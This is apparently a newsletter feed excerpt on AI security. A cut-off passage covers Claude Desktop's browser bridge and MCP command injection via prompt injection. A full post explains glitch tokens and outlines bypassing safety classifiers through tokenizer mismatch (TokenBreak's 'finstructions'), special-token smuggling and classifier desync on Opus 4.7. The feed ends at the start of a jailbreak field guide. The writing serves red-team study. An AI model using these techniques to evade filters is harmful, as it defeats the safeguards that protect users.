Anthropic command-line coding agent. The thing privacy researchers flagged is Claude Desktop, the chat app, which silently writes a Native Messaging manifest into multiple browser profile directories on macOS and pre-authorizes a few Claude extension IDs to talk to a local helper outside the browser sandbox. Most reviewers call that a dark pattern. Spyware in the strict sense requires actual exfiltration, and nobody has documented any. The risk lives in the bridge it pre-positions for future use.</p><h3>What can an attacker do with the Claude Desktop manifest right now?</h3><p>Nothing on its own. The manifest opens a door, but activation requires both a Claude browser extension installed and a successful prompt injection from a hostile webpage. Once that lands, the injected agent reaches the local helper through the pre-authorized bridge and runs commands at user privilege level, outside the sandbox. Anthropic&#8217;s own numbers put prompt injection success against Claude for Chrome at 11.2% even with mitigations. Pre-positioning the door without consent is the whole problem.</p><h3>Why hasn&#8217;t Anthropic patched the MCP command injection?</h3><p>Officially, Anthropic considers the STDIO behavior expected. Their position is that the protocol is built to launch local processes, sanitization is the developer&#8217;s job, and the SDKs work as designed. Ox Security disagrees and says manifest-only execution or a command allowlist at the protocol layer would have killed the entire vulnerability class for everyone downstream in one change. Until Anthropic moves, defenders have to harden each MCP-consuming app individually, which is what the supply chain looked like before this advisory dropped.</p><div class="callout-block" data-callout="true"><p>ToxSec is run by a USMC veteran and Security Engineer with hands-on experience at AWS and the NSA. CISSP certified, M.S. in Cybersecurity Engineering. He covers security vulnerabilities, attack chains, and the tools defenders actually need to understand.</p></div>]]></content:encoded></item><item><title><![CDATA[Token-Level AI Security: The Opus 4.7 Tokenizer Graveyard]]></title><description><![CDATA[A new tokenizer ships fresh dead zones, and every model now carries a graveyard of glitch tokens nobody has mapped yet.]]></description><link>https://www.toxsec.com/p/token-level-ai-security-the-opus</link><guid isPermaLink="false">https://www.toxsec.com/p/token-level-ai-security-the-opus</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Fri, 24 Apr 2026 13:31:18 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!0rHB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!0rHB!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!0rHB!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!0rHB!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!0rHB!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!0rHB!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!0rHB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:7092693,&quot;alt&quot;:&quot;Token-level AI security analysis of Claude Opus 4.7&#8217;s new tokenizer, covering glitch tokens, SolidGoldMagikarp-style vocabulary dead zones, and fresh LLM tokenization attack surfaces. &quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194937953?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F843d6186-7165-423c-8660-ced0e9471778_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Token-level AI security analysis of Claude Opus 4.7&#8217;s new tokenizer, covering glitch tokens, SolidGoldMagikarp-style vocabulary dead zones, and fresh LLM tokenization attack surfaces. " title="Token-level AI security analysis of Claude Opus 4.7&#8217;s new tokenizer, covering glitch tokens, SolidGoldMagikarp-style vocabulary dead zones, and fresh LLM tokenization attack surfaces. " srcset="https://substackcdn.com/image/fetch/$s_!0rHB!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!0rHB!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!0rHB!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!0rHB!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd71592cd-125c-401c-bd68-865fd2daec52_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> Claude Opus 4.7 shipped April 16 with a new tokenizer. Token counts jumped 1.0 to 1.35x, sometimes higher in the wild. Everyone&#8217;s fighting about pricing. Token-level AI security has a quieter question: every new tokenizer ships with a fresh graveyard of glitch tokens, and nobody has mapped this one yet.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>What Is Token-Level AI Security?</h2><p>Alright. Token-level AI security starts with the plumbing underneath every language model. That plumbing is where a surprising amount of attack surface lives, and Opus 4.7 just changed it.</p><p>A tokenizer is the thing that turns text into numbers. You type &#8220;hello world,&#8221; and before the model sees anything, that string gets chopped into a handful of tokens. Each token maps to an entry in a fixed vocabulary, usually around a hundred thousand slots, with each slot pointing to a vector the model actually reasons over.</p><p>No tokens, no math. No math, no model.</p><p>Most modern systems use a flavor of byte-pair encoding, BPE for short. BPE starts from individual characters and greedily merges the most common pairs into longer tokens until the vocabulary hits the target size. The exact list of merges decides how every input text gets sliced, and that slicing is what the model sees. Change the tokenizer and you change the model&#8217;s eyeballs.</p><p>Token-level AI security is the art of messing with that slicing. Keyword filters, safety classifiers, prompt injection detectors, they all operate on tokens or on strings that assume a particular tokenization. Break that assumption and you break the filter.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:&quot;5993a5af-0a62-4615-983a-a698d8d2eaa1&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python">import tiktoken

enc = tiktoken.get_encoding("cl100k_base")

text = "hello world"
ids  = enc.encode(text)

for tid in ids:
    print(f"{tid:&gt;6}  {enc.decode([tid])!r}")</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;cd2098e3-49d1-4d7b-bba2-56aa02d410bb&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash"> 15339  'hello'
  1917  ' world'</code></pre></div><h2>Glitch Tokens and the Dead Zones in Every Vocabulary</h2><p>Here&#8217;s where it gets fun. A tokenizer gets built from one giant text corpus. The model gets trained on a different one. Those two corpora don&#8217;t always match.</p><p>A string can show up in the tokenizer corpus a million times and never appear once in the training data. When that happens, the vocabulary slot exists, but the embedding behind it is basically untouched noise. Dead on arrival.</p><p>In 2023, researchers documented a whole class of these and nicknamed them glitches. The canonical example is SolidGoldMagikarp. Somebody on the counting subreddit had spent years posting sequential numbers, and that username got slurped into the GPT-2 tokenizer corpus. The training data scraper skipped the forum itself. So the model shipped with a token for SolidGoldMagikarp whose embedding had never learned what that word meant.</p><p>Prompt GPT-2 or GPT-3 with the string and you&#8217;d get denial, hallucination, insults, gibberish, or a flat refusal. The token pointed nowhere useful and the model would fumble around trying to talk about something it couldn&#8217;t see.</p><p>There&#8217;s a whole zoo of these: petertodd with a leading space, davidjl123, TheNitromeFan, a handful of cursed gaming forum artifacts. Researchers have been hunting them down systematically. A 2024 paper called GlitchHunter found nearly eight thousand of them scattered across seven major LLMs.</p><p>Glitch tokens have been a documented filter bypass primitive for years. A keyword filter that looks for &#8220;bomb&#8221; doesn&#8217;t match if the BPE slicing routes around the word, and a weirdly tokenized input does exactly that on a fresh vocabulary.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!JRQO!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!JRQO!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png 424w, https://substackcdn.com/image/fetch/$s_!JRQO!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png 848w, https://substackcdn.com/image/fetch/$s_!JRQO!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png 1272w, https://substackcdn.com/image/fetch/$s_!JRQO!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!JRQO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png" width="988" height="220" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:220,&quot;width&quot;:988,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:23250,&quot;alt&quot;:&quot;Three Threats: Comparison: Token-level AI security threat diagram comparing tokenization-mismatch filter bypass, special token smuggling, and classifier desync across Opus 4.7's new tokenization surface.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194937953?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Three Threats: Comparison: Token-level AI security threat diagram comparing tokenization-mismatch filter bypass, special token smuggling, and classifier desync across Opus 4.7's new tokenization surface." title="Three Threats: Comparison: Token-level AI security threat diagram comparing tokenization-mismatch filter bypass, special token smuggling, and classifier desync across Opus 4.7's new tokenization surface." srcset="https://substackcdn.com/image/fetch/$s_!JRQO!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png 424w, https://substackcdn.com/image/fetch/$s_!JRQO!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png 848w, https://substackcdn.com/image/fetch/$s_!JRQO!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png 1272w, https://substackcdn.com/image/fetch/$s_!JRQO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F25b2c20a-74e6-4d3e-a222-95da9e232503_988x220.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><h2>What Changed With Opus 4.7&#8217;s New Tokenizer?</h2><p>Anthropic shipped <a href="https://www.toxsec.com/p/how-to-jailbreak-claude-opus">Claude Opus 4.7</a>. The release notes led with benchmarks, the new xhigh reasoning mode, and <a href="https://platform.claude.com/docs/en/about-claude/models/whats-new-claude-4-7">a quiet flag that the tokenizer had changed</a>.</p><p>Token counts jumped anywhere from one to one point three five times on the same input. In the wild, <a href="https://simonwillison.net/2026/Apr/20/claude-token-counts/">Simon Willison got one point four six</a> and Claude Code Camp hit one point four seven. Everybody reasonably freaked out about pricing.</p><p>For the security side of the house, a new tokenizer is a different kind of earthquake.</p><p>A fresh vocabulary means a fresh set of dead zones. Every weird Reddit username, every scraped forum artifact, every near-duplicate of a special token that slipped into the new BPE merges is a candidate glitch.</p><p>As of today, no academic team has published a full glitch sweep against Opus 4.7&#8217;s vocabulary. The current state of the art at AAAI 2026 was evaluated on the old tokenizer. The map is blank.</p><p>And that&#8217;s just the untrained vectors. Safety classifiers, output regex filters, and moderation APIs often assume the old tokenization. Prompt caches are partitioned per model, so detection logic that relied on cached patterns is cold.</p><p>The <a href="https://www.toxsec.com/p/the-magic-string-that-bricks-claude">documented QA string that bricks Claude</a> was a single tokenized sequence. What other single sequences produce weird, untested behavior under the new vocabulary? Nobody has swept for them yet.</p><p>Anthropic&#8217;s pitch for the tokenizer change is &#8220;more literal instruction following.&#8221; Smaller tokens, the argument goes, force attention over individual words. Maybe that helps alignment on well-lit inputs. It also means the edge cases get their own vector slots: weird near-misses, half-broken merges, strings that tokenize one way in the classifier and a different way in the model. Each one has its own separate behavior.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!MqVS!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!MqVS!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png 424w, https://substackcdn.com/image/fetch/$s_!MqVS!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png 848w, https://substackcdn.com/image/fetch/$s_!MqVS!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png 1272w, https://substackcdn.com/image/fetch/$s_!MqVS!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!MqVS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png" width="574" height="552.1004016064257" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:958,&quot;width&quot;:996,&quot;resizeWidth&quot;:574,&quot;bytes&quot;:78983,&quot;alt&quot;:&quot;Token Inflation: Horizontal Bar: Claude Opus 4.7 tokenizer inflation chart showing token counts rising from 1.00x baseline to 1.35x typical, with in-the-wild measurements from Simon Willison at 1.46x and Claude Code Camp at 1.47x.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194937953?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Token Inflation: Horizontal Bar: Claude Opus 4.7 tokenizer inflation chart showing token counts rising from 1.00x baseline to 1.35x typical, with in-the-wild measurements from Simon Willison at 1.46x and Claude Code Camp at 1.47x." title="Token Inflation: Horizontal Bar: Claude Opus 4.7 tokenizer inflation chart showing token counts rising from 1.00x baseline to 1.35x typical, with in-the-wild measurements from Simon Willison at 1.46x and Claude Code Camp at 1.47x." srcset="https://substackcdn.com/image/fetch/$s_!MqVS!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png 424w, https://substackcdn.com/image/fetch/$s_!MqVS!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png 848w, https://substackcdn.com/image/fetch/$s_!MqVS!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png 1272w, https://substackcdn.com/image/fetch/$s_!MqVS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5e3bb150-9539-40d5-9b40-e0330ef180b0_996x958.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>The Threats Worth Watching on the New Surface</h2><p>A few classes of attack get a fresh coat of paint on Opus 4.7, and if you&#8217;re red teaming right now they&#8217;re worth your attention.</p><p>Tokenization-mismatch filter bypass is the classic. HiddenLayer&#8217;s TokenBreak research showed that changing &#8220;instructions&#8221; to &#8220;finstructions&#8221; was enough to slip past a BPE-based safety classifier while the target model still understood the manipulated text perfectly. New tokenizer, new BPE merge table, new set of strings that tokenize weirdly on the classifier but sensibly on the model. Every permutation has to be re-tested.</p><p>Special token smuggling gets a fresh lane. Every new tokenizer has near-misses of the real chat template markers. If the new vocabulary has slots that look close to the role separator but aren&#8217;t quite, that gap becomes a place to smuggle. This is the family that <a href="https://www.toxsec.com/p/fck-your-guardrails">stacks with encoding to bypass filters</a> in the long tail.</p><p>Classifier desync is the sneaky one. Moderation APIs, output scanners, policy filters. Any middleware trained against the old tokenization now sees Opus 4.7 output through a slightly warped lens. The model wrote one thing, the classifier read a different thing, the decision gets made on the gap. Quietly wrong is the most dangerous kind of wrong.</p><p>The <a href="https://www.toxsec.com/p/ai-kill-chain-explained">AI kill chain framework</a> maps these token-level abuses into real attack chains.</p><p>Here&#8217;s the thing that gets me. Nobody who&#8217;s flipped a prod workload to Opus 4.7 this week has done the token-level red team pass yet. They flipped the model ID, maybe re-tuned a prompt or two, and shipped. The <a href="https://www.toxsec.com/p/pwned-by-haiku">poetry-class jailbreaks already land</a> on frontier models at rates well above what anybody expected. Token-class attacks against an unmapped vocabulary are the next punch, and the public hasn&#8217;t seen the one that lands yet.</p><blockquote><p>Paid unlocks the unfiltered version: complete archive, private Q&amp;As, and early drops. Upgrade now.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>What is token-level AI security?</h3><p>Token-level AI security is the attack and defense surface underneath normal prompt injection. Every LLM converts text into tokens before the model reasons about anything, and every safety filter reads those tokens or the strings they came from. Token-level AI security covers how attackers manipulate the tokenizer boundary to bypass filters, trigger glitch behaviors, or desync safety classifiers from the model itself.</p><h3>Why does a new tokenizer create security risk?</h3><p>A new tokenizer means a new vocabulary, new merges, new embeddings, and a new set of untrained vector slots. Every safety classifier, every regex-based output filter, every moderation API tuned to the old tokenizer now operates on slightly different inputs. Keyword filters that caught specific strings last week may not slice the same way this week. Glitch tokens are fresh and unmapped. The detection surface resets.</p><h3>Are glitch tokens a real exploit or just a curiosity?</h3><p>Both. They were discovered as a curiosity when researchers noticed GPT-2 losing its mind over SolidGoldMagikarp. They matured into a documented filter-bypass primitive when projects like GlitchHunter, GlitchMiner, and TokenBreak showed you can use tokenization weirdness to sneak payloads past safety classifiers while the target model still understands the intent. For any new tokenizer, including the one shipping with Opus 4.7, the hunt for new glitches is the first move.</p><div class="callout-block" data-callout="true"><p>ToxSec is run by a USMC veteran and Security Engineer with hands-on experience at AWS and the NSA. CISSP certified, M.S. in Cybersecurity Engineering. He covers security vulnerabilities, attack chains, and the tools defenders actually need to understand.</p></div>]]></content:encoded></item><item><title><![CDATA[How to Jailbreak Claude Opus 4.7: A Bug Bounty Field Guide]]></title><description><![CDATA[Five jailbreak families, the tools bounty hunters actually use, and the mindset that turns a prompt into a payday.]]></description><link>https://www.toxsec.com/p/how-to-jailbreak-claude-opus</link><guid isPermaLink="false">https://www.toxsec.com/p/how-to-jailbreak-claude-opus</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Mon, 20 Apr 2026 13:30:51 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!wY4d!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!wY4d!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!wY4d!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!wY4d!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!wY4d!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!wY4d!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!wY4d!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/62d6337c-a05a-4c7b-b008-7899b68a09bd_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:7297832,&quot;alt&quot;:&quot;Claude Opus 4.7 jailbreak red team field guide covering DAN persona 